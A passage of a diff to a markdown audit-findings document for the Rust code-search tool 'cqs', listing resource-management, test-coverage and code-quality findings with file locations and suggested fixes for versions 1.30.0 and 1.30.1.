+- **Location:** `src/serve/handlers.rs:86-89,100+,...` (every handler has a `spawn_blocking`), `src/serve/mod.rs:92-95`
+- **Description:** Every `cqs serve` route handler wraps its `Store` call in `tokio::task::spawn_blocking(...)` (six occurrences; at lines 86, ~100, ~140, ~180, ~210). The runtime is built via `Builder::new_multi_thread().enable_all().build()` (mod.rs:92-95) which uses tokio's defaults: `worker_threads = num_cpus` (already noted in RM-V1.29-6) and `max_blocking_threads = 512`. A hostile or buggy client opening 512 parallel `/api/graph` requests (loading a 50k-node graph response each) can saturate the blocking pool — each blocking thread holds the default 2 MB Linux stack + the SQL working set (`HashMap::with_capacity(rows.len())` for up to 50k rows = several MB). Worst case: 512 × (2 MB stack + ~10 MB working set) ≈ 6 GB. The fact that v1.30.0 added per-launch auth (#1118) closes the trivial unauthenticated DoS vector, but an authenticated user (or a malicious browser tab on the same host once they've grabbed the cookie) can still launch this.
+- **Suggested fix:** `.max_blocking_threads(8)` on the `Builder` — 8 concurrent SQL queries is more than enough for an interactive single-user UI. Combined with `.worker_threads(4)` from RM-V1.29-6 the daemon's max steady-state thread count is bounded at 12, vs. 512+num_cpus today. Optionally also wrap the inner `Store::rt.block_on` calls with a `tokio::time::timeout(30s, ...)` so a stuck SQL query doesn't pin a blocking thread indefinitely.
 
-#### [RM-V1.29-10]: `handle_socket_client` BufReader allocates capacity sized to the 1MB `.take()` cap on every connection
+#### [RM-V1.30-9]: `LocalProvider::http` uses default reqwest connection pool (no idle cap, no per-host limit)
 - **Difficulty:** easy
-- **Location:** `src/cli/watch.rs:194`
-- **Description:** `let mut reader = std::io::BufReader::new(&stream).take(1_048_577);` creates a new BufReader per accepted connection, with the default 8KB internal buffer. That's fine — but the unused 1MB cap is consumed whenever someone sends a large (but valid) request, and the BufReader itself is allocated + dropped per connection with no reuse. On burst agent traffic (100s of queries/sec on a dispatch-heavy batch loop) this is ~10MB/sec of allocator churn from per-connection buffer alloc + grow. Separately, `line` is `String::new()` at `:195` — it grows as-needed up to 1MB, then gets dropped. No per-thread recycle.
-- **Suggested fix:** Thread-local `Cell<String>` as a scratch buffer (like the `parallel_read_buf` pattern), clear + reuse per connection. Low priority — only matters at high request rates; cqs is currently bottlenecked elsewhere. Call it a scaling-headroom fix.
+- **Location:** `src/llm/local.rs:97-100`
+- **Description:** `Client::builder().timeout(timeout).redirect(Policy::none()).build()` — no `pool_max_idle_per_host`, no `pool_idle_timeout`, no `tcp_keepalive`. reqwest's blocking client defaults to `pool_max_idle_per_host = usize::MAX` and `pool_idle_timeout = 90s`. On a long-running `cqs index --llm-summaries` that submits batches over hours, the connection pool to the local server can grow without bound — particularly bad against vLLM, which is single-process and sees each idle keep-alive as a held slot in its connection table. If the daemon embeds `LocalProvider` (it doesn't today, but the LLM path is converging on daemon execution), pool growth becomes permanent.
+- **Suggested fix:** `Client::builder().pool_max_idle_per_host(self.concurrency).pool_idle_timeout(Duration::from_secs(30)).timeout(timeout)...`. Caps the idle pool at the worker count (extra idle connections beyond `concurrency` are by definition unused) and recycles after 30s of idle.
+
+#### [RM-V1.30-10]: `Mutex<Option<Arc<Tokenizer>>>` pattern in `Embedder` keeps a stale tokenizer Arc alive on `clear_session` if any inference is in flight
+- **Difficulty:** medium
+- **Location:** `src/embedder/mod.rs:261,808-823`
+- **Description:** `clear_session` sets `*self.tokenizer.lock() = None` (line 820-821), but the comment on line 256-258 explicitly says *"Arc holds a strong ref so in-flight inference that grabbed an Arc clone before this call continues with its own copy."* This is correct for safety, but the implication is that if a long-running inference (e.g. a batch of 1000 chunks at 4ms each = 4s of work) is mid-flight when `sweep_idle_sessions` fires, the tokenizer Arc stays in memory until that batch completes — the BGE-large tokenizer is ~10 MB, larger BPE vocabularies are ~20 MB. Concurrently, the next inference call after `clear_session` lazy-reloads the tokenizer (10-30 ms), so for a brief window the daemon holds *two* tokenizer copies. Combined with the parallel session reload (~500 MB), the actual peak memory during the "clear → next-use" handoff is ~1 GB rather than the documented ~500 MB. This is documented behavior, but the actual lifecycle isn't surfaced anywhere — the idle-eviction path looks like a clean drop-and-reload to the operator.
+- **Suggested fix:** Either (a) wait for in-flight inference before clearing — adds a `RwLock` around the tokenizer Arc and `clear_session` takes the write lock, blocking until inference releases its read lock; or (b) document the doubled-memory window in the `clear_session` doc comment and surface it via a `tracing::info!(stage = "clear_during_inference", ...)` event when `Arc::strong_count(&tok) > 1` at clear time so operators can correlate memory spikes. Option (b) is the lower-risk fix since (a) extends the inference critical section.
 
 ## Summary
-Found 10 resource-management issues in v1.29.0: (1) reference cache bypass in `--include-refs` path — worst offender, reloads ~500MB of Store+HNSW per daemon query; (2) QueryCache eviction spins a fresh tokio runtime hourly instead of reusing the shared daemon runtime; (3-4) rayon thread-pool rebuilds per call in `search_across_projects` / `load_references`; (5) unbounded `query_counts` HashMap in telemetry aggregation; (6) missing per-page byte caps in CHM/WebHelp converters; (7) `cqs serve` runtime uncapped at num_cpus workers; (8) missing WAL checkpoint on EmbeddingCache/QueryCache Drop despite P2 #70 claim; (9) `Box::leak` in test helpers; (10) default 2MB stack for up-to-128 daemon client threads; (11) per-connection BufReader allocator churn in watch daemon.
+Found 10 resource-management issues new in v1.30.0:
+- (1) PR #1113 detached HNSW rebuild thread can outlive daemon shutdown and contend on GPU/index lock with the next daemon's rebuild;
+- (2) sibling issue: `pending_rebuild.delta` is unbounded — bulk git operations during a rebuild window can pin 100MB+;
+- (3) `Embedder::new` opens a fresh `QueryCache` SQLite + 7-day prune on every CLI subcommand even when no embedding ever happens;
+- (4) PR #1101's `LocalProvider::stash` retains all submitted batch results until provider drop, with no LRU/TTL/cap;
+- (5) inotify watcher silently drops events on large monorepos — daemon never checks `fs.inotify.max_user_watches` or warns;
+- (6) PR #1120's `select_provider()` still fires CUDA probe + symlink work eagerly via `Embedder::new` even on no-embed commands;
+- (7) `LocalProvider` worker threads use default 2MB stack, allocating 128MB at `concurrency=64`;
+- (8) `cqs serve` handlers `spawn_blocking` without `max_blocking_threads` cap — authenticated user can pin 512 threads × ~10MB working set;
+- (9) `LocalProvider::http` reqwest client has no pool_max_idle / idle_timeout, can leak idle connections to local server over a long indexing run;
+- (10) `Embedder::clear_session` documents but doesn't surface the doubled-memory window when in-flight inference holds a tokenizer Arc concurrent with a session reload.
 
----
 
 ## Test Coverage (happy path)
 
@@ -1420,8 +1683,59 @@ Found 10 resource-management issues in v1.29.0: (1) reference cache bypass in `-
 - **Description:** Every existing `dispatch_line` test uses either a parse-failure input (`bogus`) or an adversarial malformed input. There is no test that sends a valid `search foo` / `stats` / `dead` down `dispatch_line`, reads the `Vec<u8>` sink, parses the JSON, and asserts envelope shape. The tests pin error_count/query_count invariants but not the actual output — a regression that produced the error envelope where it should have produced a success envelope would still pass the counter checks. Relatedly, `dispatch_search` is well-covered at the **handler** level but the **dispatch-line** wrap (clap parsing → handler routing → envelope serialization → newline emission) is not.
 - **Suggested fix:** Add one test in `src/cli/batch/mod.rs::tests`: `test_dispatch_line_stats_emits_success_envelope` — run `ctx.dispatch_line("stats", &mut sink)` against an init-only store, parse the `sink` bytes as JSON, assert `json["data"]["total_chunks"].is_number()` and `json["error"].is_null()`. Small. Would catch P2-class regressions (envelope-shape changes, stats serialization drift).
 
+#### TC-HAP-1.30-1: `spawn_hnsw_rebuild` and `drain_pending_rebuild` (non-blocking HNSW rebuild, #1113) ship in v1.30.0 with zero tests
+- **Difficulty:** medium
+- **Location:** `src/cli/watch.rs::spawn_hnsw_rebuild` (around line ~925, added in PR #1113), `drain_pending_rebuild` (same file). Plus the `PendingRebuild` struct fields `rx`, `delta`, `started_at` and the `RebuildOutcome` channel type (defined in WatchState section ~line 580-600).
+- **Description:** The flagship daemon fix in v1.30.0 — `cqs watch --serve` no longer blocks editor saves for 10-30s during full HNSW rebuilds — has **zero** automated test coverage. The change spawns a background thread that opens its own read-only `Store` on the slot's `index.db`, builds enriched + base HNSWs from scratch, sends the `Owned` index back through a channel, and the watch loop's `drain_pending_rebuild` replays any (chunk_id, embedding) deltas captured during the rebuild window into the new index before the swap (deduping against `new_index.ids()`). This is both correctness-critical (delta replay / dedup) and concurrency-critical (TOCTOU between rebuild snapshot and channel `recv`). A regression — e.g., delta vector dropped on swap, dedup miscompare leaking duplicates into HNSW, or rx-channel miss leaving the daemon stuck on the old index — would surface as silently-stale search results in the daemon, not as a test failure. The PR commit message explicitly calls out two failure modes (post-restart Loaded/Owned mismatch, every-100 threshold trigger) but no test was added for either.
+- **Suggested fix:** Add `tests/watch_hnsw_rebuild_test.rs` (or a `#[cfg(test)] mod` in `src/cli/watch.rs`) with three tests using `InProcessFixture`-style setup:
+  - `rebuild_completes_and_swaps_owned_index` — seed 50 chunks, call `spawn_hnsw_rebuild(...)`, wait on the channel, assert the returned `Owned` HNSW has `len() == 50` and contains all chunk ids.
+  - `delta_replayed_on_swap` — seed 50, spawn rebuild, while it's running call `WatchState::record_delta` with 5 new (id, embedding) pairs, then drain; assert the post-swap HNSW has `len() == 55` and the 5 deltas are searchable.
+  - `delta_dedup_avoids_double_insert` — seed 50, spawn rebuild, push a delta whose chunk_id already exists in the rebuild's snapshot; assert post-swap `len() == 50` (no duplicate insert) and the embedding matches the delta's value (winner is the most-recent write).
+  These can run with a tiny dim (e.g., 16) to keep the test fast — the rebuild path doesn't care about embedding semantics.
+
+#### TC-HAP-1.30-2: `for_each_command!` registry macro and the four `gen_*` emitters (#1114) ship with zero compile-fail or behavioral tests
+- **Difficulty:** medium
+- **Location:** `src/cli/registry.rs:61` (`macro_rules! for_each_command!`), `src/cli/definitions.rs:850` (`gen_batch_support_impl`), `:897` (`gen_variant_name_impl`), `src/cli/dispatch.rs:51` (`gen_dispatch_group_a`), `:83` (`gen_dispatch_group_b`). Test counts: `registry.rs` = 0, `dispatch.rs` = 0, `definitions.rs` = 20 (but those test other things — clap arg parsing, `BatchSupport`, etc.).
+- **Description:** v1.30.0 collapsed five exhaustive matches over `Commands` (~675 LOC of dispatch matches) into a single `for_each_command!` table consumed by four macro emitters. The PR comment notes "Adding a variant without a registry row is a compile error in four places" — but **no test verifies this contract**. The macros also encode group-A vs group-B classification (no-store/lifecycle/mutation vs store-using) which controls whether a command runs before or after `CommandContext::open_readonly`. A registry-row classification mistake (e.g., new mutation command added to `group_b:` instead of `group_a:`) would compile fine but silently open a read-only store before the mutation — a subtle correctness bug. Beyond classification, there is no test that walks every `Commands` variant and asserts `BatchSupport::for_command(v)` and `variant_name(v)` return non-default values, which is the only guard against a future edit silently regressing the macro emitter to a default-arm fallback.
+- **Suggested fix:** Add `src/cli/registry.rs::tests` with two tests:
+  - `every_command_variant_has_batch_support_entry` — iterate the `Commands` discriminants (use `strum::EnumIter` or a hand-rolled list), call `BatchSupport::for_command(&v)` for each; assert no variant returns the macro's default `_ => BatchSupport::None` arm by checking against an explicit allowlist of "should be None" variants. Same for `variant_name`.
+  - `group_a_variants_disjoint_from_group_b` — derive the two sets from the registry rows (or from a debug introspection helper) and assert their intersection is empty. The `unreachable!("Group A variant `{name}` handled …")` arms in `dispatch.rs` enforce this at runtime; a test enforces it at compile-time-of-tests.
+  Plus a `compile_fail` doc-test that adds a variant without a registry row, expecting a compile error (use `trybuild` if already in dev-deps, otherwise skip).
+
+#### TC-HAP-1.30-3: `select_provider` / `detect_provider` (embedder ExecutionProvider feature split, #1120) untested
+- **Difficulty:** easy
+- **Location:** `src/embedder/provider.rs:171` (`select_provider`), `:188` (`detect_provider`), `:258` (`build_session_with_provider`). Test count in this file: **0**.
+- **Description:** v1.30.0 PR #1120 (#956 Phase A) renamed `gpu-index` → `cuda-index` and split execution-provider selection out of `embedder/mod.rs` into `embedder/provider.rs`. The new module has zero tests. `select_provider` caches the result of `detect_provider` in a `OnceCell<ExecutionProvider>`, and `detect_provider` walks a feature-flag-conditional priority list (TensorRT > CUDA > CoreML > ROCm > CPU). A regression in the cache-on-first-call invariant, in the priority ordering, or in the `cfg(feature = "cuda-index")` gating could ship without anyone noticing — the prod path runs a single time per process and a wrong provider just shows up as "embeddings ran on CPU when CUDA was supposed to be enabled". The `Display for ExecutionProvider` impl at `src/embedder/mod.rs:207` is also untested.
+- **Suggested fix:** Add `src/embedder/provider.rs::tests` with three tests (gated as needed by feature flags):
+  - `cpu_when_no_features` (no feature gates, always runs) — under a thread-local override path, force `detect_provider()` into the CPU branch and assert it returns `ExecutionProvider::CPU`.
+  - `cuda_selected_when_feature_enabled` (`#[cfg(feature = "cuda-index")]`) — assert that on a CUDA-enabled build, `detect_provider` returns `CUDA { device_id: 0 }` if the runtime env reports a GPU; pin via mock or by reading `select_provider()` once and checking the variant.
+  - `select_provider_caches_first_call` — call `select_provider()` twice, assert both return the same enum value (the `OnceCell` invariant); flip an env var between calls and assert it's still cached.
+
+#### TC-HAP-1.30-4: `build_hnsw_index_owned` and `build_hnsw_base_index` — core index helpers used by both `cqs index` and the new `spawn_hnsw_rebuild` — have zero direct tests
+- **Difficulty:** medium
+- **Location:** `src/cli/commands/index/build.rs:848` (`build_hnsw_index_owned`), `:880` (`build_hnsw_base_index`). Test count for `index/build.rs`: **0**. Both fns are `pub(crate)` and called from at least 3 sites: `run_index_pipeline`, `spawn_hnsw_rebuild` (#1113), and the post-pipeline finalizer.
+- **Description:** These are the two functions every full-rebuild path goes through. `build_hnsw_index_owned` returns the enriched HNSW (used by the dual-index router); `build_hnsw_base_index` returns the base (non-enriched) HNSW (used as router fallback). The functions wrap embedding fetch + HNSW construction + on-disk save. Their callers (`cmd_index`, `spawn_hnsw_rebuild`) are integration-tested only end-to-end through `cqs index` invocations. No test asserts: (a) the returned `Owned` has the right `len()` matching chunk count, (b) the saved file at the right path can be loaded back, (c) `build_hnsw_base_index` returns `Ok(None)` when `embedding_base` rows are empty (its current shortcut), (d) the dim of the saved index matches `store.dim()`. With #1113 making these critical to the daemon-rebuild path, the absence of unit-level pins is a fresh risk.
+- **Suggested fix:** Add `src/cli/commands/index/build.rs::tests` with three tests using `InProcessFixture`:
+  - `build_hnsw_index_owned_returns_index_with_chunk_count` — seed 10 chunks with 16-dim embeddings, call `build_hnsw_index_owned(&store, &cqs_dir)`, assert `Some(idx)` returned and `idx.len() == 10`.
+  - `build_hnsw_base_index_returns_none_when_no_base_rows` — fresh store, call `build_hnsw_base_index`, assert `Ok(None)`.
+  - `build_hnsw_index_owned_round_trips_through_disk` — build, save, then `HnswIndex::load_with_dim(...)` from the saved path; assert the loaded index has the same `len()` and an arbitrary chunk-id is present in `ids()`.
+
+#### TC-HAP-1.30-5: `hyde_query_pass` and `doc_comment_pass` (LLM passes shipping in `cqs index --hyde` / `--improve-docs`) have zero tests
+- **Difficulty:** medium
+- **Location:** `src/llm/hyde.rs:11` (`hyde_query_pass`, full file 98 LOC, **zero** tests), `src/llm/doc_comments.rs:135` (`doc_comment_pass`). Compare with `src/llm/summary.rs::llm_summary_pass` which has 4+ end-to-end tests in `tests/local_provider_integration.rs:113-280`.
+- **Description:** Three LLM batch passes ship in production: `llm_summary_pass`, `doc_comment_pass`, and `hyde_query_pass`. Only `llm_summary_pass` has integration tests against the local mock server. Both `doc_comment_pass` and `hyde_query_pass` go through identical machinery — `collect_eligible_chunks` filter → `BatchPhase2::submit_or_resume` → store write — but their specific filter (e.g., `needs_doc_comment` for doc_comments, the HyDE eligibility predicate at `src/llm/hyde.rs`) and their result-purpose tags (`"hyde"` vs `"summary"` vs `"doc_comment"`) are unique. A regression in either one's filter or in the `set_pending_*_batch_id` resumption path (HyDE uses `s.get_pending_hyde_batch_id` / `s.set_pending_hyde_batch_id`) could ship — the existing `llm_summary_pass` tests don't cover them. Both passes are billed surfaces (real Anthropic dollars in the prod path); a regression that double-submits or fails resumption costs real money.
+- **Suggested fix:** Extend `tests/local_provider_integration.rs` with two parallel tests mirroring the existing `llm_summary_pass` tests:
+  - `hyde_query_pass_round_trips_through_mock_server` — seed 3 chunks, mock the local server's `/v1/chat/completions` to return canned predictions, run `hyde_query_pass`, assert `count == 3` and `store.get_summaries_by_purpose("hyde")` has 3 rows.
+  - `doc_comment_pass_skips_already_documented_functions` — seed 3 chunks where 1 has a doc comment per `needs_doc_comment`'s predicate, run `doc_comment_pass`, assert `count == 2` (the 1 already-documented chunk skipped). Verifies the unique-to-doc_comments filter.
+
 ## Summary
 
-10 findings filed. The most impactful gap is #1 — the entire `cqs serve` subsystem (v1.29.0 flagship feature) has 14 tests but all run against an empty store, so none of `build_graph` / `build_chunk_detail` / `build_hierarchy` / `build_cluster` are actually validated for correctness. Runners-up: 16 untested batch dispatch handlers (#2), no positive round-trip test for the daemon socket (#6), and the `Reranker`/`cmd_project search`/`cmd_ref_*` core functionality all lack happy-path CLI or integration coverage. Several of these are cheap adds (~1 test each) because the in-process fixture already exists.
+15 findings filed (10 from initial v1.29 audit + 5 v1.30.0-specific).
 
----
+The most impactful gaps in the v1.30.0-specific batch:
+- **TC-HAP-1.30-1** — flagship #1113 fix (non-blocking HNSW rebuild) has **zero** tests despite shipping concurrency-critical delta/dedup logic in the daemon hot path
+- **TC-HAP-1.30-2** — #1114 single-registration command registry's classification correctness (group_a vs group_b) is enforced only at compile time of the dispatch matches, not at test time; a misclassified mutation command would silently open a read-only store
+- **TC-HAP-1.30-4** — `build_hnsw_index_owned` / `build_hnsw_base_index` are now critical to both `cqs index` and `spawn_hnsw_rebuild` and have no direct unit tests
+
+The original v1.29 findings remain valid; the most impactful is still #1 — the entire `cqs serve` subsystem has 14 tests but all run against an empty store. Several of these are cheap adds (~1 test each) because the in-process fixture already exists.
+

--- a/docs/audit-findings.md
+++ b/docs/audit-findings.md
@@ -1,1741 +1,1074 @@
-# v1.30.0 Post-Release Audit Findings
+# v1.30.1 Audit Findings
 
-Generated: 2026-04-26T20:41:23Z
-
-Total: 170 findings across 16 categories.
-
-
+Generated: 2026-04-28T18:28:34Z
 ## Code Quality
 
-#### `cmd_similar` JSON output emits 3 fields; batch `dispatch_similar` emits 9 — silent parity drop in the canonical SearchResult shape
-- **Difficulty:** easy
-- **Location:** `src/cli/batch/handlers/info.rs:139-148` (batch path), vs `src/cli/display.rs:397-413` (CLI path via `display_similar_results_json`) which routes through `cqs::store::SearchResult::to_json()` at `src/store/helpers/types.rs:143-156`
-- **Description:** The CLI `cmd_similar` json branch calls `display_similar_results_json` → `r.to_json()`, which emits the canonical 9-field shape (`file, line_start, line_end, name, signature, language, chunk_type, score, content, has_parent`). The comment at display.rs:401-402 explicitly says "Delegate to SearchResult::to_json() for canonical base keys. Previously missing `type` and `has_parent` (CQ-NEW-5)." The batch path's `dispatch_similar` re-rolls JSON inline as `{name, file, score}` — only 3 fields, missing line numbers, signature, language, chunk_type, content, has_parent. Net effect: agents get a different schema for `cqs similar Foo` depending on whether the daemon is up. CQ-V1.29-3 fixed the *resolution* divergence here; this is the JSON-shape sister bug, same source.
-- **Suggested fix:** In `dispatch_similar` at `src/cli/batch/handlers/info.rs:139-148`, replace the manual `serde_json::json!` map with `filtered.iter().map(|r| r.to_json()).collect::<Vec<_>>()`. Same line count, same envelope (`{results, target, total}`), now schema-identical to the CLI path. Add a snapshot test that asserts CLI and batch produce identical key sets for the same query.
-
-#### `Reranker::new` silently ignores the `[reranker]` config section — `resolve_reranker(None)` is the only call site
-- **Difficulty:** easy
-- **Location:** `src/reranker.rs:127-154` (`Reranker::new`), `src/reranker.rs:61-77` (`resolve_reranker`), `src/reranker.rs:442-446` (`model_paths` calls `resolve_reranker(None)`)
-- **Description:** `resolve_reranker` is the entire precedence chain documented at `:59-60`: "CLI → `CQS_RERANKER_MODEL` → `[reranker] model_path` → `[reranker] preset` → hardcoded `ms-marco-minilm`." Its signature accepts `section: Option<&AuxModelSection>` to thread `Config::reranker` (defined at `src/config.rs:228`) into the resolver. But `model_paths` always passes `None`. `Reranker::new()` doesn't accept a config at all; it only reads `CQS_RERANKER_MAX_LENGTH` and `CQS_RERANKER_MODEL` (via env inside resolve_reranker). Net effect: a user who writes `[reranker] preset = "bge-reranker-base"` in `.cqs.toml` gets the default ms-marco-MiniLM with zero error or warning — silent config drop, exactly the class of bug CLAUDE.md flags as "Docs Lying Is P1." The `section` parameter on `resolve_reranker` is also dead code as long as the only caller passes `None`.
-- **Suggested fix:** Add `Reranker::with_section(section: Option<&AuxModelSection>)` (or change `new` to accept it) and thread `&config.reranker` through from the two production call sites (`src/cli/batch/mod.rs:1274`, `src/cli/store.rs:276` — both already have `Config` in scope). Inside `model_paths`, store the section on `self` (or pass through) and call `resolve_reranker(self.section.as_ref())` instead of `None`. Same pattern SPLADE already uses.
-
-#### `dispatch_diff` builds a `target_store` placeholder that's never read in its else branch
-- **Difficulty:** easy
-- **Location:** `src/cli/batch/handlers/misc.rs:354-364, 367-387`
-- **Description:** Lines 354-364 set `target_store` via `if/else`. The `if target_label == "project"` arm correctly captures `&ctx.store()`. The `else` arm calls `ctx.get_ref(target_label)?` (caches the reference store in BatchContext), then sets `target_store = &ctx.store()` with a comment "placeholder -- replaced below." But "below" at lines 367-387 is a *second* `if target_label == "project"` that only consumes `target_store` in the project branch. The else branch at line 376-387 never reads `target_store` — it calls `resolve_reference_store` afresh at line 378, opening yet another Store handle and bypassing the `get_ref` cache that line 360 just populated. So: (1) wasted I/O — the `get_ref` cached store is loaded then discarded; (2) dead-variable initialization in else; (3) a duplicate match on `target_label` that's structurally inevitable. Easy to misread and easy to break the cache invariant on the next refactor.
-- **Suggested fix:** Collapse to one match. Either: (a) use `get_ref` + `borrow_ref` for both project and ref targets, since `borrow_ref` returns `Option<RefMut<RefIndex>>` and you can take `&store` from inside the borrow's scope — `cqs::semantic_diff` is fully synchronous and the borrow lives long enough; or (b) drop the `get_ref` call entirely from the else branch and let `resolve_reference_store` own the lifetime, removing the placeholder. Either way: one `if target_label == "project"` block, no placeholder variable.
-
-#### Hardcoded "200" in user-facing gather warning lies when `CQS_GATHER_MAX_NODES` is set
-- **Difficulty:** easy
-- **Location:** `src/cli/commands/search/gather.rs:200` (the println), `src/gather.rs:153-172` (`gather_max_nodes` with env override)
-- **Description:** The text-mode warning is `println!("{}", "Warning: expansion capped at 200 nodes".yellow());` — a string literal. The actual cap is `gather_max_nodes()` which honors `CQS_GATHER_MAX_NODES` (logged at gather.rs:161 as "BFS node cap overridden via CQS_GATHER_MAX_NODES"). With `CQS_GATHER_MAX_NODES=500` the user sees "capped at 200" while results were actually capped at 500 — directly contradicts the env var the same module advertises in its tracing message. This is the exact "limit advertised ≠ limit applied" footgun that bites agents debugging "why am I getting only X results."
-- **Suggested fix:** Either capture the cap on `GatherResult` (add `pub expansion_cap_used: usize` next to `expansion_capped`) and format the message with the real number, or look up `gather_max_nodes()` again at warn time. Latter is simpler and `gather_max_nodes` already memoizes via OnceLock. Prefer the former because it makes the cap visible in `--json` output too, where agents can react to it.
-
-#### Embedding/Query cache `open_with_runtime` are ~80% copy-paste — 90+ duplicated lines in cache.rs
+#### dropped_this_cycle reset before snapshot publish hides drop signal from `--require-fresh`
 - **Difficulty:** medium
-- **Location:** `src/cache.rs:103-220` (`EmbeddingCache::open_with_runtime`) and `src/cache.rs:1412-1522` (`QueryCache::open_with_runtime`)
-- **Description:** Both methods do, in identical order: (1) `info_span!`, (2) `create_dir_all` parent + `#[cfg(unix)] set_permissions(parent, 0o700)` with identical "best effort" warn block (16 lines × 2), (3) Tokio runtime fallback (`if let Some(rt) = runtime { rt } else { Builder::new_current_thread()... }` — 9 lines × 2), (4) `SqliteConnectOptions` + `SqlitePoolOptions::new().max_connections(1).idle_timeout(30s).connect_with(opts)` — only `busy_timeout(5000 vs 2000)` differs, (5) `CREATE TABLE IF NOT EXISTS` (different schemas), (6) `0o600` chmod loop on `["", "-wal", "-shm"]` with identical comment shape (22 lines × 2). Total: ~90 lines duplicated. The two `Drop` impls (`:723-754`, `:1717-1745`) repeat the same panic-message extraction (4 lines × 2). Bug surface: any future hardening of the chmod block, or change to runtime construction, has to be applied twice. PB-V1.29-7 already noticed both blocks separately — the extracted helper is the structural fix.
-- **Suggested fix:** Extract three private helpers in `cache.rs` (or `store/helpers/sql.rs` next to `busy_timeout_from_env`): `prepare_cache_dir_perms(parent: &Path)` (parent chmod), `apply_db_file_perms(path: &Path)` (the 0o600 loop), and `connect_cache_pool(path, busy_ms, runtime, schema_sql)` (the 4-step open). Both `EmbeddingCache::open_with_runtime` and `QueryCache::open_with_runtime` collapse to ~30 lines each. The two `Drop` impls share `extract_panic_msg(payload)` — same shape as the existing `cli/pipeline/mod.rs::panic_message` (see next finding).
+- **Location:** `src/cli/watch/events.rs:139-146` (reset) + `src/cli/watch/mod.rs:1303` (publish ordering)
+- **Description:** `process_file_changes` clears `state.dropped_this_cycle = 0` at the start (line 145) before reindexing the queued files. The snapshot is then published *later in the same outer iteration* (`publish_watch_snapshot` at `mod.rs:1303`). By the time the snapshot is built, the dropped counter is always 0 — even though events for those dropped files are gone forever (they were never queued; they hit the `pending_files.len() < max_pending_files()` cap and were silently discarded at `events.rs:115`). `WatchSnapshot::compute` uses `dropped_this_cycle > 0` as a Stale signal, but it never observes a non-zero value at publish time. Practical impact: `cqs eval --require-fresh` and `cqs status --watch-fresh --wait` can return `Fresh` immediately after a bulk burst that dropped files at the cap. The dropped files won't be reindexed until the next reconciliation pass (up to 30s later). The whole point of Layer 3 (#1182) is to gate eval on freshness; this defeats it for the high-pressure case the cap exists to handle.
+- **Suggested fix:** Either (a) accumulate `dropped_total` cumulatively across cycles and only clear it after a successful reconcile pass that requeues all files, or (b) move the reset to *after* `publish_watch_snapshot` in the outer loop so at least the cycle in which the drop happened reports `Stale`. Option (a) is correct; option (b) is a one-line stop-gap.
 
-#### `panic_message` helper duplicated 4 ways across 3 modules — `cli/pipeline/mod.rs::panic_message` and 3 inline copies in Drop impls
+#### `delta_saturated` flag is published but ignored by `FreshnessState::compute`
 - **Difficulty:** easy
-- **Location:** `src/cli/pipeline/mod.rs:223-232` (`fn panic_message`), `src/store/mod.rs:1322-1326` (Store::drop), `src/cache.rs:743-747` (EmbeddingCache::drop), `src/cache.rs:1735-1739` (QueryCache::drop)
-- **Description:** Four copies of the same `payload.downcast_ref::<&str>().or(downcast_ref::<String>()).unwrap_or("unknown panic")` extraction. The pipeline version is a free function; the three Drop versions inline it. Functions return `String` vs `&str`, but the logic is identical. Anyone tightening the panic-extraction (e.g. adding `Box<dyn Error>` or a `format!` of the type id when both downcasts fail) has to update four sites. Low-risk debt but easy to delete.
-- **Suggested fix:** Promote `panic_message` to `pub(crate) fn` in a single common module (`src/lib.rs` next to `temp_suffix`, or a new `src/panic_msg.rs`). Make all four sites use it. The Drop sites currently take `&Box<dyn Any + Send>`; harmonize on that signature so all callers fit. Drop the pipeline-private version.
+- **Location:** `src/watch_status.rs:199-209`
+- **Description:** `WatchSnapshotInput` carries `delta_saturated`, and the snapshot serializes it on the wire — but `compute()` never consults it when picking `FreshnessState`. When the in-flight rebuild's pending delta saturates, the rebuilt HNSW will be discarded on swap (`rebuild.rs:352-366`); operators get a `tracing::warn!` line, but `--require-fresh` callers don't see it because the snapshot still classifies as `Rebuilding` (or, after the doomed rebuild's discard, `Fresh`). The published flag is informational only — there's no path that ties it back to a state-machine consequence.
+- **Suggested fix:** Either roll `delta_saturated` into `Stale` in `compute()` (rebuild is doomed, treat as stale until next threshold rebuild lands) or drop the field from the wire shape entirely. Half-wired flags rot.
 
-#### Repeated `match std::env::var("CQS_*") { Ok(v) => v.parse()... }` pattern at 25+ sites — `limits::parse_env_*` helpers exist but are pub(crate)-private
+#### `cqs eval --require-fresh` Timeout error message omits drop/saturation signals
+- **Difficulty:** easy
+- **Location:** `src/cli/commands/eval/mod.rs:248-255`
+- **Description:** The Timeout `bail!` shows `modified_files`, `pending_notes`, `rebuild_in_flight` from the snapshot — but not `dropped_this_cycle` or `delta_saturated`. An operator who hits a timeout will see the queue isn't draining but won't be told *why* (cap-saturation vs. ordinary slow indexing vs. delta-saturated rebuild that's about to be thrown away). Diagnostic gap right where it matters most.
+- **Suggested fix:** Include `dropped_this_cycle=` and `delta_saturated=` in the bail message. Adds two fields, costs nothing.
+
+#### `strip_token_param` doesn't case-fold or percent-decode — token leaks into redirect URL
 - **Difficulty:** medium
-- **Location:** `src/limits.rs:230-260` (`parse_env_f32` / `parse_env_usize` / `parse_env_u64`); duplicated open-coded equivalents in: `src/cli/watch.rs:65,74,100,498,510,766,942,1430` (8 sites), `src/llm/mod.rs:176,315,406,434` (4 sites), `src/cli/pipeline/types.rs:80,98,117,144` (4 sites), `src/hnsw/persist.rs:19,41,63` (3 sites), `src/embedder/models.rs:565,571`, `src/embedder/mod.rs:330`, `src/cache.rs:206,1509`, `src/gather.rs:156`, `src/cli/commands/graph/trace.rs:357`, `src/impact/bfs.rs:16`, `src/reranker.rs:129`
-- **Description:** The library limits module (`src/limits.rs:224`) clearly notes "shared parsing helpers" with three carefully-tested fns covering `f32 / usize / u64` shapes. They reject zero, garbage, and non-finite values uniformly, with consistent test coverage. But the helpers are `pub(crate)` — visible only inside `cqs::limits` callers. Every other module that wants the same behavior re-rolls the pattern, frequently with slight variations: some accept `0`, some don't; some warn on bad input, most don't; some clamp, some don't. `EmbeddingCache::open_with_runtime` accepts `CQS_CACHE_MAX_SIZE=0` (silently sets cap to 0 → always-evict mode), while `QueryCache` rejects `0` (`.filter(|&n: &u64| n > 0)`) and falls back to default. Same env-shape, opposite behavior. Standardizing fixes this and shrinks the codebase ~150 lines. (See related finding on `CQS_CACHE_MAX_SIZE` zero-handling below.)
